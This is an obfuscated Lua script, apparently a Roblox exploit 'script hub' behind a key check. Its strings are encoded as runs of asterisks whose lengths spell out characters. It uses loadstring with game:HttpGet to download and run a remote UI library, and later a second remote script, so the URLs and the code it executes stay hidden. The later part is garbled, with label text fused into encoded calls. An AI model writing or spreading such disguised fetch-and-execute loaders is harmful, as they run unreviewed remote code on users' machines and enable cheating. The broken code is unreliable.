function yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local Library = loadstring(game:HttpGet(yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','************************************************************************************************************************','************************************************************************','*****************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************','***********************************************','***************************************************************************','*************************************************************************************************','**********************************************************************************************************************','***************************************************************************************************************','*********************************************','*************************************************************************************','*************************************************************************','*********************************************','****************************************************************************','*********************************************************************************************************','**************************************************************************************************','******************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************************************************************','***************************************************************************************************************','*********************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','*****************************************************************************************************','**********************************************','************************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************'})))()
local Window = Library.CreateLib(yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************'}), yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************************************','*************************************************************************************************','******************************************************************************************************************','***********************************************************************************************************','************************************************************************************','********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}))
local Key = Window:NewTab(yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************'}))

_G.Key = yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'******************************************************************','*****************************************************************************************************','************************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************','*************************************************************************************************','***********************************************************************************************','*******************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','************************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','*******************************************************','*******************************************************','********************************************************','********************************************************','*********************************'})
_G.KeyInput = yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'*******************************************************************************************************************','********************************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************'})

function MakeScriptHub()
    loadstring(game:httpget(yaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**************************************************************************','***********************************************************************************','********************************************************************************','***********************************************************************************','***********************************************************************************','***********************************************************************************','***********************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*******************************************************************************************************************','*****************************************','*****************************************','****************************************','*****************************************','*************','**********','*****************************************************************************************************','**************************************************************************************************************','****************************************************************************************************','*************','**********','*************','**********','***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','***************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','**********************************************************','******************************************************************************','*****************************************************************************************************','***********************************************************************************************************************','************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','***************************************************************************************************************','************************************************************************************************************************','****************************************'})Key hereyaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************','********************************'})KeyyaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************','********************************','******************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************************','***************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','****************************************','********************************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','*****************************************','*************','**********','*********','***********************************************************************************************','***********************************************************************','**********************************************','***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','*************************************************************************','**************************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************','*************************************************************','********************************','********************************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','*************','**********','*****************************************************************************************************','**************************************************************************************************************','****************************************************************************************************','*****************************************','*************','**********','*************','**********','*************','**********','***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','***************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','**********************************************************','******************************************************************************','*****************************************************************************************************','***********************************************************************************************************************','******************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','****************************************'})Check KeyyaBvSHrjufLOYfCbWcCLCqCJLZKLCaFOFhvRyFQJWdQrAOENiRhTVbOQWilPDqhmIKZSSxFchUoUOvWIzMFmegpWzgv({'********************************************','********************************'})check key', function()
    if _G.KeyInput == _G.Key then
       MakeScriptHub() 

    end
end)    
